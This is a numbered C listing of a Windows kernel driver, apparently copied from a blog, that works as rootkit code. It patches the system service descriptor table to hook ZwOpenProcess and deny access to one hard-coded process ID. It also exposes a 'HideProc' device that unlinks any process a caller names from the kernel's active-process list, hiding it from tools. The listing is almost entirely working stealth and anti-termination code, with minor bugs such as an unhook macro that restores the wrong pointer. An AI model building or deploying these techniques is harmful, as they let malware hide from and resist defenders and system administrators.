/*ZwOpenProcess hook example to return STATUS_ACCESS_DENIEDhttp://unlmtd.wordp

1. /*ZwOpenProcess hook example to return STATUS_ACCESS_DENIED
2. http://unlmtd.wordpress.com/*/
3.  
4. #include "ntddk.h"
5. #include "ntifs.h"
6.  
7.  
8.  
9. /* The kernel's Service Descriptor Table*/
10. //.....................................................
11.  
12. typedef struct ServiceDescriptorEntry {
13.         unsigned int *ServiceTableBase;
14.         unsigned int *ServiceCounterTableBase; /*Used only in checked build*/
15.         unsigned int NumberOfServices;
16.         unsigned char *ParamTableBase;
17. } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
18.  
19.  
20. __declspec(dllimport)  ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
21.  
22. /*Very useful macros*/
23.  
24. typedef unsigned int UINT;
25. typedef int BOOL;
26.  
27. typedef struct _hpstruct{
28.     UINT uPid;
29.     UINT uFlinkOffset;
30. }hpstruct;
31.  
32. #define SYSTEMSERVICE(_function)  KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]
33.  
34. typedef DWORD (ULONG);
35. PMDL  g_pmdlSystemCall;
36. PVOID *MappedSystemCallTable;
37.  
38. #define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
39.  
40. #define HOOK_SYSCALL(_Function, _Hook, _Orig )  \
41.     _Orig = (PVOID) InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
42.  
43. #define UNHOOK_SYSCALL(_Function, _Hook, _Orig )  \
44.     InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
45.  
46. /*Origianl prototype*/
47.  
48. //////////////////////////.................................
49. NTSYSAPI
50. NTSTATUS
51. NTAPI ZwOpenProcess (
52.                      OUT PHANDLE ProcessHandle,
53.                      IN ACCESS_MASK DesiredAccess,
54.                      IN POBJECT_ATTRIBUTES ObjectAttributes,
55.                      IN PCLIENT_ID ClientId OPTIONAL);
56.  
57.  
58. /*Pointer ZwOpenProcess*/
59.  
60. typedef NTSTATUS (*ZWOPENPROCESS)(
61.                                   OUT PHANDLE ProcessHandle,
62.                                   IN ACCESS_MASK DesiredAccess,
63.                                   IN POBJECT_ATTRIBUTES ObjectAttributes,
64.                                   IN PCLIENT_ID ClientId OPTIONAL);
65.  
66. /*OldZwOpenProcess points to the original function*/
67.  
68. ZWOPENPROCESS        OldZwOpenProcess;
69.  
70.  
71. /*Our function*/
72.  
73. NTSTATUS NewZwOpenProcess(
74.                           OUT PHANDLE ProcessHandle,
75.                           IN ACCESS_MASK DesiredAccess,
76.                           IN POBJECT_ATTRIBUTES ObjectAttributes,
77.                           IN PCLIENT_ID ClientId OPTIONAL)
78. {
79.     HANDLE ProcessId;
80.     __try /*we do this to avoid crashes*/
81.     {
82.  
83.         ProcessId = ClientId->UniqueProcess;
84.  
85.     }
86.     __except(EXCEPTION_EXECUTE_HANDLER) /*we do this to avoid crashes*/
87.     {
88.  
89.         /*DbgPrint("Exception");*/
90.         return STATUS_INVALID_PARAMETER;
91.  
92.     }
93.  
94.     if (ProcessId == (HANDLE)2816) /*Check if the PID matches our protected process PID*/
95.     {
96.         return STATUS_ACCESS_DENIED; /*What we want, access denied.*/
97.     }
98.  
99.     else
100.         /*Important, if you don't do this your system will and and crash/BSOD*/
101.         return OldZwOpenProcess(ProcessHandle, DesiredAccess,ObjectAttributes, ClientId);
102. }
103.  
104.  
105. /*Unloading routine*/
106.  
107. VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
108. {
109.     DbgPrint("_Process Protector Unloading_\n");
110.  
111.     /* unhook system calls*/
112.     UNHOOK_SYSCALL( ZwOpenProcess, OldZwOpenProcess, NewZwOpenProcess );
113.  
114.     /* Unlock and Free MDL*/
115.     if(g_pmdlSystemCall)
116.     {
117.         MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
118.         IoFreeMdl(g_pmdlSystemCall);
119.     }
120. }
121.  
122. NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath);
123. NTSTATUS HideProc_Create(PDEVICE_OBJECT DeviceObject, PIRP Irp);
124. NTSTATUS HideProc_Write(PDEVICE_OBJECT DeviceObject, PIRP Irp);
125. NTSTATUS HideProc_Close(PDEVICE_OBJECT DeviceObject, PIRP Irp);
126. VOID HideProc_Unload(PDRIVER_OBJECT  DriverObject);
127. NTSTATUS HideProc_Unsupported(PDEVICE_OBJECT DeviceObject, PIRP Irp);
128. #pragma alloc_text(INIT, DriverEntry)
129. #pragma alloc_text(PAGE, HideProc_Create)
130. #pragma alloc_text(PAGE, HideProc_Write)
131. #pragma alloc_text(PAGE, HideProc_Close)
132. #pragma alloc_text(PAGE, HideProc_Unload)
133. #pragma alloc_text(PAGE, HideProc_Unsupported)
134.  
135.  
136.  
137.  
138.  
139.  
140.  
141.  
142.  
143.  
144.  
145.  
146.  
147.  
148.  
149.  
150.  
151.  
152. NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath){
153.     UNICODE_STRING usDriverName, usDosDeviceName;
154.     PDEVICE_OBJECT pDeviceObject;
155.     NTSTATUS ntStatus;
156.     UINT uiIndex;
157.  
158.     DbgPrint("HideProc DriverEntry Called\n");
159.  
160.     RtlInitUnicodeString(&usDriverName, L"\\Device\\HideProc");
161.     RtlInitUnicodeString(&usDosDeviceName, L"\\DosDevices\\HideProc");
162.  
163.     ntStatus = IoCreateDevice(pDriverObject, 0, &usDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject);
164.     if(NT_SUCCESS(ntStatus)){
165.         for(uiIndex = 0; uiIndex < IRP_MJ_MAXIMUM_FUNCTION; uiIndex++)
166.             pDriverObject->MajorFunction[uiIndex]    = HideProc_Unsupported;
167.         pDriverObject->MajorFunction[IRP_MJ_CREATE]    = HideProc_Create;
168.         pDriverObject->MajorFunction[IRP_MJ_WRITE]    = HideProc_Write;
169.         pDriverObject->MajorFunction[IRP_MJ_CLOSE]    = HideProc_Close;
170.         pDriverObject->DriverUnload            = HideProc_Unload;
171.         pDeviceObject->Flags |= DO_DIRECT_IO;
172.         pDeviceObject->Flags &= (~DO_DEVICE_INITIALIZING);
173.         IoCreateSymbolicLink(&usDosDeviceName, &usDriverName);
174.     }
175.  
176.  
177.  
178. ///////////////////
179.     /* Register a dispatch function for Unload*/
180.     pDriverObject->DriverUnload  = OnUnload;
181.  
182.  
183.     /* save old system call locations*/
184.     DbgPrint("_Process Protector Called_");
185.     OldZwOpenProcess =(ZWOPENPROCESS)(SYSTEMSERVICE(ZwOpenProcess));
186.  
187.     /* Map the memory into our domain so we can change the permissions on the MDL*/
188.     g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4);
189.     if(!g_pmdlSystemCall)
190.         return STATUS_UNSUCCESSFUL;
191.  
192.     MmBuildMdlForNonPagedPool(g_pmdlSystemCall);
193.  
194.     /* Change the flags of the MDL*/
195.     g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
196.  
197.     MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);
198.  
199.     /* hook system calls*/
200.     DbgPrint("_Hooking ZwOpenProcess_");
201.     HOOK_SYSCALL( ZwOpenProcess, NewZwOpenProcess, OldZwOpenProcess );
202.     return ntStatus;
203. }
204.  
205. NTSTATUS HideProc_Create(PDEVICE_OBJECT DeviceObject, PIRP Irp){
206.     NTSTATUS NtStatus = STATUS_SUCCESS;
207.     DbgPrint("HideProc_Create Called\n");
208.     return NtStatus;
209. }
210.  
211. NTSTATUS HideProc_Write(PDEVICE_OBJECT DeviceObject, PIRP Irp){
212.     NTSTATUS NtStatus = STATUS_INVALID_PARAMETER;
213.     PIO_STACK_LOCATION pIoStackIrp = NULL;
214.     UINT dwDataWritten = 0;
215.     ULONG dwEProcAddr;
216.     PLIST_ENTRY pListProcs;
217.     PEPROCESS pEProc;
218.  
219.     hpstruct *hps;
220.  
221.     DbgPrint("HideProc_Write Called\n");
222.     pIoStackIrp = IoGetCurrentIrpStackLocation(Irp);
223.  
224.     if(pIoStackIrp && Irp->MdlAddress){
225.         hps = (hpstruct *)MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority);
226.         if(hps){
227.             if(pIoStackIrp->Parameters.Write.Length == sizeof(hpstruct)){
228.                 if(PsLookupProcessByProcessId((PVOID)hps->uPid, &pEProc) == STATUS_SUCCESS){
229.                     DbgPrint("EPROCESS found. Address: %08lX.\n", pEProc);
230.                     DbgPrint("Now hiding process %d...\n", hps->uPid);
231.                     dwEProcAddr = (ULONG) pEProc;
232.                     __try{
233.                         pListProcs = (PLIST_ENTRY) (dwEProcAddr + hps->uFlinkOffset);
234.                         *((ULONG*) pListProcs->Blink) = (ULONG) (pListProcs->Flink);   //set flink of prev proc to flink of cur proc
235.                         *((ULONG*) pListProcs->Flink+1) = (ULONG) (pListProcs->Blink); //set blink of next proc to blink of cur proc
236.                         pListProcs->Flink = (PLIST_ENTRY) &(pListProcs->Flink); //set flink and blink of cur proc to themselves
237.                         pListProcs->Blink = (PLIST_ENTRY) &(pListProcs->Flink); //otherwise might bsod when exiting process
238.                         DbgPrint("Process now hidden.\n");
239.                     }__except(EXCEPTION_EXECUTE_HANDLER){
240.                         NtStatus = GetExceptionCode();
241.                         DbgPrint("Exception: %d.\n", NtStatus);
242.                     }
243.                     NtStatus = STATUS_SUCCESS;
244.                 }
245.             }else{
246.                 NtStatus = STATUS_BUFFER_TOO_SMALL;
247.             }
248.             dwDataWritten = sizeof(hpstruct);
249.         }
250.     }
251.  
252.     Irp->IoStatus.Status = NtStatus;
253.     Irp->IoStatus.Information = dwDataWritten;
254.     IoCompleteRequest(Irp, IO_NO_INCREMENT);
255.     return NtStatus;
256. }
257.  
258. NTSTATUS HideProc_Close(PDEVICE_OBJECT DeviceObject, PIRP Irp){
259.     NTSTATUS NtStatus = STATUS_SUCCESS;
260.     DbgPrint("HideProc_Close Called\n");
261.     return NtStatus;
262. }
263.  
264. VOID HideProc_Unload(PDRIVER_OBJECT  DriverObject){
265.     UNICODE_STRING usDosDeviceName;
266.     DbgPrint("HideProc_Unload Called\n");
267.     RtlInitUnicodeString(&usDosDeviceName, L"\\DosDevices\\HideProc");
268.     IoDeleteSymbolicLink(&usDosDeviceName);
269.     IoDeleteDevice(DriverObject->DeviceObject);
270. }
271.  
272. NTSTATUS HideProc_Unsupported(PDEVICE_OBJECT DeviceObject, PIRP Irp){
273.     NTSTATUS NtStatus = STATUS_NOT_SUPPORTED;
274.     DbgPrint("HideProc_Unsupported Called\n");
275.     return NtStatus;
276. }